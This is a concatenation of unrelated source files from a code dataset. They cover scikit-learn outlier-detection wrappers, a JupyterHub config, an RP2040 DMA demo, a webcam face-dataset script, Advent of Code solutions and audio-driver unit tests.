important DBSCAN parameter to choose appropriately for your data set
and distance function.
min_samples : int, default=5
The number of samples (or total weight) in a neighborhood for a point
to be considered as a core point. This includes the point itself.
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string or callable, it must be one of
the options allowed by :func:`sklearn.metrics.pairwise_distances` for
its metric parameter.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit.
X may be a :term:`sparse graph <sparse graph>`,
in which case only "nonzero" elements may be considered neighbors.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
The algorithm to be used by the NearestNeighbors module
to compute pointwise distances and find nearest neighbors.
See NearestNeighbors module documentation for details.
leaf_size : int, default=30
Leaf size passed to BallTree or cKDTree. This can affect the speed
of the construction and query, as well as the memory required
to store the tree. The optimal value depends
on the nature of the problem.
p : float, default=2
The power of the Minkowski metric to be used to calculate distance
between points.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search. ``None`` means
1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means
using all processors. See :term:`Glossary <n_jobs>` for more details.
If precomputed distance are used, parallel execution is not available
and thus n_jobs will have no effect.
"""
# Initialize the DBSCAN estimator
from sklearn.cluster import DBSCAN
algo = DBSCAN(
eps=eps,
min_samples=min_samples,
metric=metric,
metric_params=metric_params,
algorithm=algorithm,
leaf_size=leaf_size,
p=p,
n_jobs=n_jobs
)
super(DBSCANOutliers, self).__init__(algorithm=algo, features=features)
# -- Functions for specific scikit-learn outlier detectors --------------------
def dbscan(
df, columns, features=None, eps=0.5, min_samples=5, metric='minkowski',
metric_params=None, algorithm='auto', leaf_size=30, p=2, n_jobs=None
):
"""Perform outlier detection using DBSCAN clustering. Returns values as
outliers that are not added to any cluster. Supports all parameters of
the DBSCAN implementation in scikit-learn (documentation copied below).
Parameters
----------
df: pandas.DataFrame
Input data frame.
columns: list, tuple, or openclean.function.eval.base.EvalFunction
Evaluation function to extract values from data frame rows. This
can also be a list or tuple of evaluation functions or a list of
column names or index positions.
features: openclean.profiling.embedding.base.ValueEmbedder, optional
Generator for feature vectors that computes a vector of numeric values
for a given scalar value (or tuple).
eps : float, default=0.5
The maximum distance between two samples for one to be considered
as in the neighborhood of the other. This is not a maximum bound
on the distances of points within a cluster. This is the most
important DBSCAN parameter to choose appropriately for your data set
and distance function.
min_samples : int, default=5
The number of samples (or total weight) in a neighborhood for a point
to be considered as a core point. This includes the point itself.
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string or callable, it must be one of
the options allowed by :func:`sklearn.metrics.pairwise_distances` for
its metric parameter.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square during fit.
X may be a :term:`sparse graph <sparse graph>`,
in which case only "nonzero" elements may be considered neighbors.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
The algorithm to be used by the NearestNeighbors module
to compute pointwise distances and find nearest neighbors.
See NearestNeighbors module documentation for details.
leaf_size : int, default=30
Leaf size passed to BallTree or cKDTree. This can affect the speed
of the construction and query, as well as the memory required
to store the tree. The optimal value depends
on the nature of the problem.
p : float, default=2
The power of the Minkowski metric to be used to calculate distance
between points.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search. ``None`` means
1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means
using all processors. See :term:`Glossary <n_jobs>` for more details.
If precomputed distance are used, parallel execution is not available
and thus n_jobs will have no effect.
Returns
-------
list
"""
# Run the scikit-learn outlier detection algoritm with DBSCAN as the
# estimator.
op = DBSCANOutliers(
features=features,
eps=eps,
min_samples=min_samples,
metric=metric,
metric_params=metric_params,
algorithm=algorithm,
leaf_size=leaf_size,
p=p,
n_jobs=n_jobs
)
return op.run(df=df, columns=columns)
def isolation_forest(
df, columns, features=None, n_estimators=100, max_samples='auto',
contamination='auto', max_features=1., bootstrap=False, n_jobs=None,
random_state=None, verbose=0, warm_start=False
):
"""Perform outlier detection using the isolation forest outlier detection.
Supports most parameters of the IsolationForest implementation in
scikit-learn (documentation copied below).
Parameters
----------
df: pandas.DataFrame
Input data frame.
columns: list, tuple, or openclean.function.eval.base.EvalFunction
Evaluation function to extract values from data frame rows. This
can also be a list or tuple of evaluation functions or a list of
column names or index positions.
features: openclean.profiling.embedding.base.ValueEmbedder, optional
Generator for feature vectors that computes a vector of numeric values
for a given scalar value (or tuple).
n_estimators : int, default=100
The number of base estimators in the ensemble.
max_samples : "auto", int or float, default="auto"
The number of samples to draw from X to train each base estimator.
- If int, then draw `max_samples` samples.
- If float, then draw `max_samples * X.shape[0]` samples.
- If "auto", then `max_samples=min(256, n_samples)`.
If max_samples is larger than the number of samples provided,
all samples will be used for all trees (no sampling).
contamination : 'auto' or float, default='auto'
The amount of contamination of the data set, i.e. the proportion
of outliers in the data set. Used when fitting to define the threshold
on the scores of the samples.
- If 'auto', the threshold is determined as in the
original paper.
- If float, the contamination should be in the range [0, 0.5].
.. versionchanged:: 0.22
The default value of ``contamination`` changed from 0.1
to ``'auto'``.
max_features : int or float, default=1.0
The number of features to draw from X to train each base estimator.
- If int, then draw `max_features` features.
- If float, then draw `max_features * X.shape[1]` features.
bootstrap : bool, default=False
If True, individual trees are fit on random subsets of the training
data sampled with replacement. If False, sampling without replacement
is performed.
n_jobs : int, default=None
The number of jobs to run in parallel for both :meth:`fit` and
:meth:`predict`. ``None`` means 1 unless in a
:obj:`joblib.parallel_backend` context. ``-1`` means using all
processors. See :term:`Glossary <n_jobs>` for more details.
random_state : int or RandomState, default=None
Controls the pseudo-randomness of the selection of the feature
and split values for each branching step and each tree in the forest.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
verbose : int, default=0
Controls the verbosity of the tree building process.
warm_start : bool, default=False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
Returns
-------
list
"""
# Initialize the IsolationForest estimator
from sklearn.ensemble import IsolationForest
algo = IsolationForest(
n_estimators=n_estimators,
max_samples=max_samples,
contamination=contamination,
max_features=max_features,
bootstrap=bootstrap,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start
)
# Run the scikit-learn outlier detection algoritm with IsolationForest as
# the estimator.
op = SklearnOutliers(algorithm=algo, features=features)
return op.run(df=df, columns=columns)
def local_outlier_factor(
df, columns, features=None, n_neighbors=20, algorithm='auto', leaf_size=30,
metric='minkowski', p=2, metric_params=None, contamination='auto',
novelty=False, n_jobs=None
):
"""Perform outlier detection using Local Outlier Factor (LOF). Supports all
parameters of the LocalOutlierFactor implementation in scikit-learn
(documentation copied below).
Parameters
----------
df: pandas.DataFrame
Input data frame.
columns: list, tuple, or openclean.function.eval.base.EvalFunction
Evaluation function to extract values from data frame rows. This
can also be a list or tuple of evaluation functions or a list of
column names or index positions.
features: openclean.profiling.embedding.base.ValueEmbedder
Generator for feature vectors that computes a vector of numeric values
for a given scalar value (or tuple).
n_neighbors : int, default=20
Number of neighbors to use by default for :meth:`kneighbors` queries.
If n_neighbors is larger than the number of samples provided,
all samples will be used.
algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`BallTree`
- 'kd_tree' will use :class:`KDTree`
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
Note: fitting on sparse input will override the setting of
this parameter, using brute force.
leaf_size : int, default=30
Leaf size passed to :class:`BallTree` or :class:`KDTree`. This can
affect the speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
metric : str or callable, default='minkowski'
metric used for the distance computation. Any metric from scikit-learn
or scipy.spatial.distance can be used.
If metric is "precomputed", X is assumed to be a distance matrix and
must be square. X may be a sparse matrix, in which case only "nonzero"
elements may be considered neighbors.
If metric is a callable function, it is called on each
pair of instances (rows) and the resulting value recorded. The callable
should take two arrays as input and return one value indicating the
distance between them. This works for Scipy's metrics, but is less
efficient than passing the metric name as a string.
Valid values for metric are:
- from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1', 'l2',
'manhattan']
- from scipy.spatial.distance: ['braycurtis', 'canberra', 'chebyshev',
'correlation', 'dice', 'hamming', 'jaccard', 'kulsinski',
'mahalanobis', 'minkowski', 'rogerstanimoto', 'russellrao',
'seuclidean', 'sokalmichener', 'sokalsneath', 'sqeuclidean',
'yule']
See the documentation for scipy.spatial.distance for details on these
metrics:
https://docs.scipy.org/doc/scipy/reference/spatial.distance.html
p : int, default=2
Parameter for the Minkowski metric from
:func:`sklearn.metrics.pairwise.pairwise_distances`. When p = 1, this
is equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric_params : dict, default=None
Additional keyword arguments for the metric function.
contamination : 'auto' or float, default='auto'
The amount of contamination of the data set, i.e. the proportion
of outliers in the data set. When fitting this is used to define the
threshold on the scores of the samples.
- if 'auto', the threshold is determined as in the
original paper,
- if a float, the contamination should be in the range [0, 0.5].
novelty : bool, default=False
By default, LocalOutlierFactor is only meant to be used for outlier
detection (novelty=False). Set novelty to True if you want to use
LocalOutlierFactor for novelty detection. In this case be aware that
that you should only use predict, decision_function and score_samples
on new unseen data and not on the training set.
n_jobs : int, default=None
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Returns
-------
list
"""
# Initialize the LocalOutlierFactor estimator.
from sklearn.neighbors import LocalOutlierFactor
algo = LocalOutlierFactor(
n_neighbors=n_neighbors,
algorithm=algorithm,
leaf_size=leaf_size,
metric=metric,
p=p,
metric_params=metric_params,
contamination=contamination,
novelty=novelty,
n_jobs=n_jobs
)
# Run the scikit-learn outlier detection algoritm with LocalOutlierFactor
# as the estimator.
op = SklearnOutliers(algorithm=algo, features=features)
return op.run(df=df, columns=columns)
def one_class_svm(
df, columns, features=None, kernel='rbf', degree=3, gamma='scale',
coef0=0.0, tol=1e-3, nu=0.5, shrinking=True, cache_size=200, verbose=False,
max_iter=-1
):
"""Perform outlier detection using Unsupervised Outlier Detection. Supports
all parameters of the OneClassSVM implementation in scikit-learn
(documentation copied below).
Parameters
----------
df: pandas.DataFrame
Input data frame.
columns: list, tuple, or openclean.function.eval.base.EvalFunction
Evaluation function to extract values from data frame rows. This
can also be a list or tuple of evaluation functions or a list of
column names or index positions.
features: openclean.profiling.embedding.base.ValueEmbedder
Generator for feature vectors that computes a vector of numeric values
for a given scalar value (or tuple).
kernel : {'linear', 'poly', 'rbf', 'sigmoid', 'precomputed'}, default='rbf'
Specifies the kernel type to be used in the algorithm.
It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
a callable.
If none is given, 'rbf' will be used. If a callable is given it is
used to precompute the kernel matrix.
degree : int, default=3
Degree of the polynomial kernel function ('poly').
Ignored by all other kernels.
gamma : {'scale', 'auto'} or float, default='scale'
Kernel coefficient for 'rbf', 'poly' and 'sigmoid'.
- if ``gamma='scale'`` (default) is passed then it uses
1 / (n_features * X.var()) as value of gamma,
- if 'auto', uses 1 / n_features.
.. versionchanged:: 0.22
The default value of ``gamma`` changed from 'auto' to 'scale'.
coef0 : float, default=0.0
Independent term in kernel function.
It is only significant in 'poly' and 'sigmoid'.
tol : float, default=1e-3
Tolerance for stopping criterion.
nu : float, default=0.5
An upper bound on the fraction of training
errors and a lower bound of the fraction of support
vectors. Should be in the interval (0, 1]. By default 0.5
will be taken.
shrinking : bool, default=True
Whether to use the shrinking heuristic.
See the :ref:`User Guide <shrinking_svm>`.
cache_size : float, default=200
Specify the size of the kernel cache (in MB).
verbose : bool, default=False
Enable verbose output. Note that this setting takes advantage of a
per-process runtime setting in libsvm that, if enabled, may not work
properly in a multithreaded context.
max_iter : int, default=-1
Hard limit on iterations within solver, or -1 for no limit.
Returns
-------
list
"""
# Initialize the OneClassSVM estimator.
from sklearn.svm import OneClassSVM
algo = OneClassSVM(
kernel=kernel,
degree=degree,
gamma=gamma,
coef0=coef0,
tol=tol,
nu=nu,
shrinking=shrinking,
cache_size=cache_size,
verbose=verbose,
max_iter=max_iter
)
# Run the scikit-learn outlier detection algoritm with OneClassSVM
# as the estimator.
op = SklearnOutliers(algorithm=algo, features=features)
return op.run(df=df, columns=columns)
def robust_covariance(
df, columns, features=None, store_precision=True, assume_centered=False,
support_fraction=None, contamination=0.1, random_state=None
):
"""Perform outlier detection using EllipticEnvelope for detecting outliers
in a Gaussian distributed dataset. Supports all parameters of the
EllipticEnvelope implementation in scikit-learn (documentation copied
below).
Parameters
----------
df: pandas.DataFrame
Input data frame.
columns: list, tuple, or openclean.function.eval.base.EvalFunction
Evaluation function to extract values from data frame rows. This
can also be a list or tuple of evaluation functions or a list of
column names or index positions.
features: openclean.profiling.embedding.base.ValueEmbedder
Generator for feature vectors that computes a vector of numeric values
for a given scalar value (or tuple).
store_precision : bool, default=True
Specify if the estimated precision is stored.
assume_centered : bool, default=False
If True, the support of robust location and covariance estimates
is computed, and a covariance estimate is recomputed from it,
without centering the data.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, the robust location and covariance are directly computed
with the FastMCD algorithm without additional treatment.
support_fraction : float, default=None
The proportion of points to be included in the support of the raw
MCD estimate. If None, the minimum value of support_fraction will
be used within the algorithm: `[n_sample + n_features + 1] / 2`.
Range is (0, 1).
contamination : float, default=0.1
The amount of contamination of the data set, i.e. the proportion
of outliers in the data set. Range is (0, 0.5).
random_state : int or RandomState instance, default=None
Determines the pseudo random number generator for shuffling
the data. Pass an int for reproducible results across multiple function
calls. See :term: `Glossary <random_state>`.
Returns
-------
list
"""
# Initialize the EllipticEnvelope estimator.
from sklearn.covariance import EllipticEnvelope
algo = EllipticEnvelope(
store_precision=store_precision,
assume_centered=assume_centered,
support_fraction=support_fraction,
contamination=contamination,
random_state=random_state
)
# Run the scikit-learn outlier detection algoritm with EllipticEnvelope
# as the estimator.
op = SklearnOutliers(algorithm=algo, features=features)
return op.run(df=df, columns=columns)
| StarcoderdataPython |
4821811 | <reponame>hhefzi/CKG<gh_stars>0
#------------------------------------------------------------------------------
# Configuration file for jupyterhub.
#------------------------------------------------------------------------------
# set of users who can administer the Hub itself
c.Authenticator.admin_users = {'adminhub'}
# set the Clinical Knowledge Graph logo
c.JupyterHub.logo_file = '/CKG/src/report_manager/assets/logo_small.jpg'
## The public facing port of the proxy.
c.JupyterHub.port = 8090
c.Spawner.notebook_dir='/CKG/src/notebooks'
# Supports Linux and BSD variants only.
c.LocalAuthenticator.create_system_users = True
## The command to use for creating users as a list of strings
c.Authenticator.add_user_cmd = ['adduser', '--force-badname', '-q', '--gecos', '""', '--disabled-password']
#Use Google Authenticator
# from oauthenticator.google import GoogleOAuthenticator
# c.JupyterHub.authenticator_class = GoogleOAuthenticator
# c.GoogleOAuthenticator.oauth_callback_url = 'http://example.com/hub/oauth_callback'
# c.GoogleOAuthenticator.client_id = '635823090211-nhef5sl5sqdbq469k4t0l5d14ur7jc8j.apps.googleusercontent.com'
# c.GoogleOAuthenticator.client_secret = '<KEY>'
#Start Jupyterhub as JupyterLAB
#c.Spawner.default_url = '/lab'
| StarcoderdataPython |
1648154 | <filename>1014 Find Local Peaks.py
class Solution:
def solve(self, nums):
if len(nums) == 1: return []
return list(filter(lambda i:(nums[i] > nums[i-1] if i > 0 else True) and (nums[i] > nums[i+1] if i < len(nums)-1 else True), range(len(nums))))
| StarcoderdataPython |
11321923 | # Author <NAME>
import click
import os
import cv2
import shutil
import random
import time
from faces_train import train_faces
def unique_id():
"""
Generator for the unique ids
:return: Returns unique ids
"""
seed = random.getrandbits(32)
while True:
yield seed
seed += 1
def create_dataset(dataset_dir, count, camera):
"""
Generates dataset from the connected camera
:param dataset_dir: Directory to store the output.
:param count: Number of frames to capture.
:param camera: Camera ID for opencv lib.
:raise Exception: If camera does not work.
"""
if input("Are you ready to take pictures? y/n: ") == "n":
exit(0)
video = cv2.VideoCapture(camera)
cnt = 0
print(f"Turning on the camera with id {camera} to take {count} frames. Smile :)...")
unique_seq = unique_id()
while cnt != count:
filename = f"{dataset_dir}{next(unique_seq)}.png"
check, frame = video.read()
if not check:
raise Exception("Camera does not work!")
print(f"{cnt}/{count}: Capturing: {filename}....")
cv2.imwrite(filename, frame)
time.sleep(2)
cnt += 1
print("Dataset created successfully!")
video.release()
def check_basedir(dir_to_check):
"""
Check the passed directory.
:param dir_to_check: Folder to check
:raise Exception: If dataset base folder does not exist
"""
print(f"Checking directory: {dir_to_check} ...")
if not os.path.isdir(dir_to_check):
raise Exception("Dataset folder does not exists!")
def process_dataset_directory(base_dir, name, clean):
"""
Prepare the dataset folder. Clean it or create it if necessary.
:param base_dir: Base directory for storing output
:param name: Name of dataset
:param clean: Should remove all files in it
:return: Final dataset directory
"""
dataset_dir = os.path.join(base_dir, name)
if clean and os.path.isdir(dataset_dir):
shutil.rmtree(dataset_dir)
if not os.path.isdir(dataset_dir):
os.makedirs(dataset_dir)
return os.path.join(dataset_dir, '')
@click.command()
@click.argument("name")
@click.option('--count', '-c', default=1000, help="Count of images to take. '1000' by default.")
@click.option('--base-dir', '-b', default=os.path.join(os.getcwd(), "dataset"),
help="Base directory where dataset will be saved. './dataset' in this directory by default.")
@click.option('--clean', '-cl', default=False, help="Should clean existing data. 'False' by default.")
@click.option('--camera', '-ca', default=0, help="Camera input for CV2 lib. '0' by default.")
@click.option('--run-train', '-rt', default=True, help="Should run faces_train.py automatically? True default.")
def main(name, count, base_dir, clean, camera, run_train):
"""
Basic script to create a dataset for face recognition app.
:param name: Name of dataset
:param count: Count of images to create
:param base_dir: Base directory for storing the output
:param clean: Should clean the folder if exists
:param camera: Camera id for opencv lib
:param run_train: Should run learning automatically
"""
# cast strings to bool
clean = bool(clean)
run_train = bool(run_train)
check_basedir(base_dir)
dataset_dir = process_dataset_directory(base_dir, name, clean)
create_dataset(dataset_dir, count, camera)
if not run_train:
print("Please run faces_train.py to let python learn from new created dataset.")
else:
train_faces()
if __name__ == '__main__':
main()
| StarcoderdataPython |
11222245 | <reponame>gehtsoft/backtest-docker<gh_stars>1-10
import json, requests, sys, os.path
import rest_conf as conf
import datafile_rest as datafiles
import unittest
class DataFileTest(unittest.TestCase):
def test_datafiles(self):
file = conf.DATA_ADD
resp = datafiles.add_datafile(file)
self.assertEqual(resp.status_code, 200, "Invalid response code {0}, {1}".format(resp.status_code, resp.content))
found = datafiles.find_datafile(file)
self.assertTrue(found, "Added datafile not found")
resp_del = datafiles.delete_datafile(file)
self.assertEqual(resp_del.status_code, 200, "Invalid response delete code {0}, {1}".format(resp_del.status_code, resp_del.content))
found = datafiles.find_datafile(file)
self.assertTrue(not found, "Datafile was not deleted")
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
304235 | import time
import uctypes
import struct
import machine
class DMA:
DMA_BASE = 0x50000000
DMA_EN = 0x01 << 0
HIGH_PRIO = 0x01 << 1
INCR_READ = 0x01 << 4
INCR_WRITE= 0x01 << 5
DREQ_PIO0_RX0 = 0x04 << 15
DREQ_SPI1_TX = 0x12 << 15
DREQ_PERMANENT= 0x3F << 15
IRQ_QUIET = 0x01 << 21
BUSY = 0x01 << 24
def __init__( self, channelNumber ):
offset = channelNumber * 0x40
self.CHx_READ_ADDR = DMA.DMA_BASE + 0x00 + offset
self.CHx_WRITE_ADDR = DMA.DMA_BASE + 0x04 + offset
self.CHx_TRANS_COUNT = DMA.DMA_BASE + 0x08 + offset
self.CHx_CTRL_TRIG = DMA.DMA_BASE + 0x0C + offset
def config( self, src_addr, dst_addr, count, src_inc, dst_inc, trig_dreq ):
machine.mem32[ self.CHx_CTRL_TRIG ] = 0
machine.mem32[ self.CHx_READ_ADDR ] = src_addr
machine.mem32[ self.CHx_WRITE_ADDR ] = dst_addr
machine.mem32[ self.CHx_TRANS_COUNT ] = count
trig_val = 0
if( src_inc ):
trig_val |= DMA.INCR_READ
if( dst_inc ):
trig_val |= DMA.INCR_WRITE
trig_val |= trig_dreq
machine.mem32[ self.CHx_CTRL_TRIG ] = trig_val
def enable( self ):
machine.mem32[ self.CHx_CTRL_TRIG ] |= DMA.DMA_EN
def disable( self ):
machine.mem32[ self.CHx_CTRL_TRIG ] = 0
def is_busy( self ):
if( machine.mem32[ self.CHx_CTRL_TRIG ] & DMA.BUSY ):
return True
else:
return False
def test_dma():
dma = DMA(0)
src_buf = b"Hello World!"*1000
dst_buf = bytearray( 12*1000 )
dma.config(
src_addr = uctypes.addressof( src_buf ),
dst_addr = uctypes.addressof( dst_buf ),
count = len( src_buf ),
src_inc = True,
dst_inc = True,
trig_dreq = DMA.DREQ_PERMANENT
)
t0 = time.ticks_us()
dma.enable()
while( dma.is_busy() ):
pass
dma.disable()
t1 = time.ticks_us()
print( "dst", dst_buf[0:12], "..." )
print( "Transfer speed [B/s]:", len( src_buf )/((t1-t0)*1e-6) )
print( "@CPU freq:", machine.freq() )
if __name__=='__main__':
test_dma()
print( "done" ) | StarcoderdataPython |
6681622 | import numpy as np
from ..solution import Solution
class Day07(Solution, day=7):
def parse(self):
with open(self.input_file, "rt") as infile:
return [int(x) for x in infile.read().strip().split(",")]
def part1(self):
"""
Want to compute argmin_x s(x) where s(x) = Σ_{d ∈ data} |x - d|. Unfortunately,
s isn't smooth, but we can use the notion of subdifferentials.
In particular, the subdifferential ∂_d(x) of |x - d| is {-1} for x < d, {1}
for x > d, and [-1, 1] for x = d. Then the subdifferential of s is
∂s(x) = ∑_d ∂_d(x)
where the sum is the Minkowski sum A + B = { a + b | a ∈ A and b ∈ B }.
Now the minimum of s will occur at x such that 0 ∈ ∂s(x). Thus, 0 ∈ ∂s(x)
if and only if::
|#{d' ∈ data | d' < x} - #{d' ∈ data | d' > x}| ≤ #{d' ∈ data | d' = x} (1)
(Note that in the above, each of these sets is considered as a multiset.)
Now consider the case when (1) is satisfied by some x ∉ data. Then let
D = min {d' ∈ data | d' > x } and d = max {d' ∈ data | d' > x }. Note d < D.
Claim 1: When data != ∅, d and D exist. For if x > than all d' ∈ data, we would
have the LHS of (1) to #data > 0 where as the RHS is definitionally 0. Thus,
D exists. Similarly for d.
Claim 2: At least one of d and D also satisfies (1). Consider the case when
#{d' ∈ data | d' < x} > #{d' ∈ data | d' > x}
so the LHS of (1) is
#{d' ∈ data | d' < x} - #{d' ∈ data | d' > x} ≥ 0.
By assumption, this is 0 since the RHS is 0. But then
#{d' ∈ data | d' < x} = #{d' ∈ data | d' < D}
and
#{d' ∈ data | d' > x} = #{d' ∈ data | d' > D} + #{d' ∈ data | d' = D}.
Putting this altogether:
#{d' ∈ data | d' < D} - #{d' ∈ data | d' > D} = #{d' ∈ data | d' = D}
and so (1) is satisfied by D. If on the other hand,
#{d' ∈ data | d' < x} < #{d' ∈ data | d' > x}
then d satisfies (1) by the same logic.
Thus, since we only need one argmin, we need only check for values that
appear in data.
"""
data = np.array(self.data) # Assume this is nonempty
values, counts = np.unique(data, return_counts=True)
# At this point the short version of this code is just the following:
#
# potential_argmins = np.arange(values.min(), values.max() + 1, dtype=int)
# vals = np.sum(np.abs(potential_argmins[:, np.newaxis] - values[np.newaxis, :]) * counts[np.newaxis, :], axis=1)
# return vals.min()
# But it's more fun with math!
cumsum = np.cumsum(counts)
count_lt_value = np.hstack([[0], cumsum[:-1]])
cumsum = np.cumsum(counts[::-1])[::-1]
count_gt_value = np.hstack([cumsum[1:], [0]])
subgradient_has_zero = np.where(
np.abs(count_lt_value - count_gt_value) <= counts
)[0]
if len(subgradient_has_zero) == 0:
raise ValueError("Something went wrong in the math!")
argmin = values[subgradient_has_zero[0]]
return np.sum(np.abs(values - argmin) * counts)
def part2(self):
"""
In this part, our s(x) is
s(x) = Σ_{d ∈ data} |x - d| * (|x - d| + 1) / 2 = 1/2 Σ ((x - d)^2 + |x - d|)
We can throw away the 1/2 for the gradient computation. The resulting terms of
our sum have a derivative 2(x - d) + ∂_d(x) which is:
* 2(x - d) + 1 if x > d
* 2(x - d) - 1 if x < d
* [-1, 1] if x = d
And thus the equivalent of (1) above is:
|#{d' ∈ data | d' < x} - #{d' ∈ data | d' > x} + Σ_{d' ∈ data} 2(x - d')| ≤ #{d' ∈ data | d' = x} (2)
Now Σ_{d' ∈ data} 2(x - d') = 2 * x * #data - 2 Σ_{d' ∈ data} d', which is convenient.
Moreover, it is no longer the case that the argmin actually has to reside in
data, as the example problem makes clear! So we have two cases: When the
RHS of (2) is 0 and when the RHS of (2) is _not_ zero.
In the case the RHS of (2) is not zero, then we proceed as in the previous case.
In the case where the RHS of (2) is zero, we're looking between the various
d' ∈ data. Consider the case where a, b ∈ data are two consecutive values in
data. Then on the interval (a, b) we have
#{d' ∈ data | d' < x} - #{d' ∈ data | d' > x} - 2 * Σ_{d' ∈ data} d' (3)
is constant, and we want to ask if (3) + 2a * #data and (3) + 2b * #data have opposite signs.
"""
data = np.array(self.data) # Assume this is nonempty
values, counts = np.unique(data, return_counts=True)
# At this point the short version of this code is just the following:
#
# potential_argmins = np.arange(values.min(), values.max() + 1, dtype=int)
# tmp = np.abs(potential_argmins[:, np.newaxis] - values[np.newaxis, :])
# tmp *= (tmp + 1) * counts[np.newaxis, :]
# vals = np.sum(tmp, axis=1) / 2
# return vals.min()
# But it's more fun with math!
cumsum = np.cumsum(counts)
count_lt_value = np.hstack([[0], cumsum[:-1]])
cumsum = np.cumsum(counts[::-1])[::-1]
count_gt_value = np.hstack([cumsum[1:], [0]])
extra_term = 2 * (values - np.sum(data))
# The case when the RHS of (2) is not 0:
subgradient_has_zero = np.where(
np.abs(count_lt_value - count_gt_value + extra_term) <= counts
)[0]
if len(subgradient_has_zero) != 0:
argmin = values[subgradient_has_zero[0]]
tmp = np.abs(values - argmin)
return np.sum(tmp * (tmp + 1) * counts) / 2
# The case when the RHS of (2) is 0. Here we're considering the values to be the
# indexed by the a of (a, b) above. So we need to add back in (counts) to the
# the sum to account for more d' < x.
lhs = (count_lt_value - count_gt_value - 2 * np.sum(data) + counts)[:-1]
opp_sign = ((lhs + 2 * values[:-1] * len(data)) < 0) != (
lhs + 2 * values[1:] * len(data) < 0
)
if not opp_sign.any():
raise ValueError("Need to deal with off to the left and right cases")
# Now the true minimum is at this value:
idx = np.where(opp_sign)[0][0]
a = values[idx]
b = values[idx + 1]
ya = lhs[idx] + 2 * a * len(data)
yb = lhs[idx + 1] + 2 * b * len(data)
argmin = -ya * (b - a) / (yb - ya) + a
# However, we're only allowed to move integer amounts, so we have to round
lower = np.abs(values - np.floor(argmin))
upper = np.abs(values - np.ceil(argmin))
return int(
min(
[
np.sum(lower * (lower + 1) * counts) / 2,
np.sum(upper * (upper + 1) * counts) / 2,
]
)
)
| StarcoderdataPython |
9611650 | <gh_stars>0
import unittest
import logging
import sys
sys.path.append('../')
from backend.bcm2835audiodriver import Bcm2835AudioDriver
from cleep.exception import InvalidParameter, MissingParameter, CommandError, Unauthorized
from cleep.libs.tests import session, lib
import os
import time
from mock import Mock, MagicMock, patch
class TestBcm2835AudioDriver(unittest.TestCase):
def setUp(self):
self.session = lib.TestLib()
logging.basicConfig(level=logging.CRITICAL, format=u'%(asctime)s %(name)s:%(lineno)d %(levelname)s : %(message)s')
def tearDown(self):
pass
def init_session(self):
self.fs = Mock()
self.driver = Bcm2835AudioDriver()
self.driver.cleep_filesystem = Mock()
self.driver._on_registered()
def test__get_card_name(self):
self.driver = Bcm2835AudioDriver()
self.driver.cleep_filesystem = Mock()
devices_names = [
{ 'card_name': 'Headphones', 'card_desc': 'bcm2835 Headphones', 'device_name': 'Headphones', 'device_desc': 'bcm2835 Headphones' },
]
result = self.driver._get_card_name(devices_names)
self.assertEqual(result, 'Headphones')
def test__get_card_name_card_not_found(self):
self.driver = Bcm2835AudioDriver()
self.driver.cleep_filesystem = Mock()
devices_names = [
{ 'card_name': 'Headphones', 'card_desc': 'Headphones', 'device_name': 'Headphones', 'device_desc': 'Headphones' },
]
result = self.driver._get_card_name(devices_names)
self.assertIsNone(result)
@patch('backend.bcm2835audiodriver.Tools')
@patch('backend.bcm2835audiodriver.ConfigTxt')
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
def test__install(self, mock_asound, mock_configtxt, mock_tools):
mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
self.init_session()
self.driver._install()
self.assertTrue(mock_asound.return_value.delete.called)
self.assertTrue(mock_configtxt.return_value.enable_audio.called)
@patch('backend.bcm2835audiodriver.Tools')
@patch('backend.bcm2835audiodriver.ConfigTxt')
@patch('backend.bcm2835audiodriver.EtcAsoundConf')
def test__install_enable_audio_failed(self, mock_asound, mock_configtxt, mock_tools):
mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
mock_configtxt.return_value.enable_audio.return_value = False
self.init_session()
with self.assertRaises(Exception) as cm:
self.driver._install()
self.assertEqual(str(cm.exception), 'Error enabling raspberry pi audio')
self.assertTrue(mock_asound.return_value.delete.called)
@patch('backend.bcm2835audiodriver.Tools')
def test__install_with_no_audio_supported(self, mock_tools):
mock_tools.raspberry_pi_infos.return_value = { 'audio': False }
self.init_session()
with self.assertRaises(Exception) as cm:
self.driver._install()
self.assertEqual(str(cm.exception), 'Raspberry pi has no onboard audio device')
@patch('backend.bcm2835audiodriver.Tools')
@patch('backend.bcm2835audiodriver.ConfigTxt')
def test__uninstall(self, mock_configtxt, mock_tools):
mock_tools.raspberry_pi_infos.return_value = { 'audio': True }
self.init_session()
self.driver._uninstall()
self.assertTrue(mock_configtxt.return_value.disable_audio.called)
@patch('backend.bcm2835audiodriver.Tools')
